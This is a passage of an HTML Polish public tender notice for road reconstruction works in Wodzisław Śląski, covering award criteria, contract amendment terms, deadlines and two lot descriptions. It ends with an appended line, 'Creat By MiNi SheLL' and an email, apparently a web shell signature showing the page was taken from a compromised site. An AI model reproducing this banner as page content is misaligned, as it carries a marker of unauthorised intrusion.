                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>30</td></tr><tr><td>doświadczenie kierownika budowy</td><td>5</td></tr><tr><td>sposób zatrudnenia kieronika budowy</td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zmiany treści zawartej umowy możliwe są jedynie w trybie art. 144 ustawy Prawo zamówień publicznych i mogą nastąpić tylko na piśmie w formie aneksu pod rygorem nieważności w niżej opisanych przypadkach:
Lp. Przyczyna/okoliczności, Skutek  zmiana w umowie/aneks
1.Wystąpienia niekorzystnych warunków atmosferycznych mających wpływ na prawidłowe prowadzenie robót  (potwierdzone przez Inspektora Nadzoru i zapisane w protokole lub dzienniku budowy):
- opady atmosferyczne  powodujące zmianę parametrów gruntu (podłoża) uniemożliwiające prowadzenie robót  przez co najmniej 5 kolejnych dni w oparciu o obowiązujące przepisy i Polskie Normy. 
- temperatura podłoża w ciągu dnia poniżej 5 C, brak suchego podłoża w czasie robót asfaltowych Przedłużenie terminu realizacji umowy o tyle dni, ile dni trwały warunki atmosferyczne uniemożliwiające prowadzenie robót
2.Konieczność zmiany dokumentacji projektowej wynikła w trakcie realizacji inwestycji Zmiana terminu realizacji zamówienia 
o tyle dni, ile trwało przeprojektowanie i wykonanie robót dodatkowych
3.Wystąpienie zdarzeń losowych - klęska żywiołowa Zmiana terminu wykonania zadania o tyle dni, ile trwało wstrzymanie robót i doprowadzenie terenu budowy do stanu pierwotnego
5.Znalezienie niewybuchów lub niewypałów, Przesunięcie terminu wykonania zadania 
o taki czas, ile trwało wstrzymanie robót związane z usunięciem niewybuchów lub niewypałów  i doprowadzenie terenu budowy do stanu pierwotnego
6.Znaleziska i odkrycia archeologiczne	Przesunięcie terminu wykonania zadania 
o taki czas, ile trwało wstrzymanie robót związane z pracami archeologicznymi  i doprowadzenie terenu budowy do stanu pierwotnego
7.Rezygnacja z części robót na skutek sytuacji niemożliwej wcześniej do przewidzenia Zmniejszenie wynagrodzenia wykonawcy o kwotę, którą należałoby zapłacić gdyby przedmiotowe roboty zostały wykonane
Zmiana producenta lub przedłużające się terminy dostaw materiałów/urządzeń, wycofania materiałów/urządzeń z użycia	Zmiana terminu wykonania zamówienia o czas potrzebny na zakup nowych materiałów/urządzeń
8.Wystąpienie robót zamiennych, robót dodatkowych, zamówień dodatkowych spowodowanych względami atmosferycznymi, oszczędnościowymi, gruntowo - wodnymi oraz innymi niemożliwymi do przewidzenia na etapie podpisania umowy oraz robót koniecznych nie ujętych w przedmiarze robót bądź nie wycenionych w kosztorysie ofertowym, a wynikających z projektu budowlanego lub zasad wiedzy technicznej.	Ewentualna zmiana wartości umowy, zmiana sposobu wykonania przedmiotu zamówienia i terminu realizacji.
9.Zmiana stawki VAT.Zmiana wartości brutto umowy.
10.Zmiana kluczowego personelu wskazanego w ofercie przetargowej	Konieczność wskazania spełnienia warunków udziału w postępowaniu opisanych w SIWZ
11.Zmiana podwykonawców lub zatrudnienie nowych podwykonawców	Zmiana załącznika do umowy
W   razie  wystąpienia   powyższych   przesłanek,   Wykonawca  jest  zobowiązany  do ich udokumentowania w sposób nie budzący zastrzeżeń (protokół konieczności, oświadczenie,  dokumentacja fotograficzna, notatka itp.) 
2.W przypadku wystąpienia robót dodatkowych oraz robót koniecznych nie ujętych w przedmiarze robót bądź nie wycenionych w kosztorysie ofertowym, a wynikających z projektu budowlanego lub zasad wiedzy technicznej, wykonawca zobowiązany jest wykonać roboty, przy jednoczesnym zachowaniu tych samych norm i standardów. Wycenę tych robót wykona na podstawie cen jednostkowych zadania podstawowego, zaś wszelkie roboty nie występujące w kosztorysie ofertowym według cen rynkowych lub średnich cen Sekocenbudu. Podstawą wykonania wyżej wymienionych robót jest zatwierdzony protokół konieczności podpisana umowa lub aneks do umowy.
3.Wykonawca nie może żądać wynagrodzenia za dodatkowe zakresy robót bez przedłożenia w/w dokumentów.
4.Wykonawca bez pisemnej zgody Zamawiającego nie może dokonać żadnych cesji związanych z realizacją umowy.
5.Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu umowy konieczności wykonania robót zamiennych w stosunku do przewidzianych w dokumentacji projektowej, w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy.
6.Zamawiający dopuszcza wprowadzenie zmiany materiałów i urządzeń przedstawionych w ofercie przetargowej pod warunkiem, że zmiany te będą korzystne dla Zamawiającego. 
Będą to przykładowo okoliczności:
1) powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację
i konserwacje wykonanego przedmiotu umowy,
2) powodujące poprawienie parametrów technicznych,
3) wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany
obowiązujących przepisów.
7.Dodatkowo możliwa jest zmiana producenta poszczególnych materiałów i urządzeń przedstawionych w ofercie przetargowej, pod warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych materiałów i urządzeń.
8.Zmiany, o których mowa w ust. 5  7 muszą być każdorazowo zatwierdzane przez Zamawiającego (Inspektora Nadzoru inwestorskiego) w porozumieniu z projektantem. 
9.Zmiana  ilości robót wynikająca z wielkości przyjętych w przedmiarze a faktycznie wykonanych na podstawie: dokumentacji projektowej, warunków technicznych lub zasad wiedzy technicznej nie wymaga zmiany umowy. 
10.Rezygnacja z części robót  może nastąpić wyłącznie za zgodą Zamawiającego i nie wymaga zmiany umowy. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 13/02/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              olski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>1)	Udrożnienie ruchu w południowej części Subregionu Zachodniego Etap I, zadanie 1 i zadanie 3  przebudowa ulicy Matuszczyka w Wodzisławiu Śląskim<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zakres przedmiotu zamówienia obejmuje:
-przebudowę jezdni od km 0+39,00 do km 0+421,5 oraz od km 0+580,00 do km 0+894,00, 
-budowę czterech zatok autobusowych, 
- przebudowę chodników po obydwu stronach drogi z wyłączeniem odcinka chodnika po  stronie lewej od km 0 + 123,00  do 0 + 383,00 . 
- budowę ekranów akustycznych, 
- przebudowę kanalizacji deszczowej, 
- wykonanie barier energochłonnych oraz wygrodzeń dla pieszych, 
- przebudowę oświetlenia ulicznego, 
- przebudowę kolidujących odcinków sieci teletechnicznej i gazowej oraz zabezpieczenie sieci wodociągowej, 
- wykonanie oznakowania pionowego i poziomego,
Po przebudowie nośność nawierzchni jezdni na całej długości będzie wynosić 115 kN.
Długość drogi  0,697 km
Kategoria ruchu  4.
Klasa drogi  Z.

Droga po przebudowie będzie posiadać dwie jezdnie po dwa pasy ruchu w każdym kierunku. Jezdnie będą posiadać szerokość 7,0 m i zostaną rozdzielone wyspą środkową o szerokości 4,0 m. Inwestycja obejmie również przebudowę skrzyżowania z drogą wewnętrzną do postaci skrzyżowania skanalizowanego
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>30</td></tr><tr><td>doświadczenie kierownika budowy</td><td>5</td></tr><tr><td>sposób zatrudniena kierownika budowy</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>2)	Plan Rozwoju Sieci dróg - Modernizacja ulicy Osadniczej  Etap I <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>zakres przedmiotu zamówienia obejmuje:
- przebudowę jezdni od skrzyżowania z ul. Pałacową do skrzyżowania w rejonie posesji nr 9 na długości ok 330mb.
- Szczegółowy zakres przedmiotu zamówienia został określony w dokumentacjach projektowych. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja</td><td>30</td></tr><tr><td>doświadczenie kierownika budowy</td><td>5</td></tr><tr><td>sposób zatrudnienia kierownika budowy</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com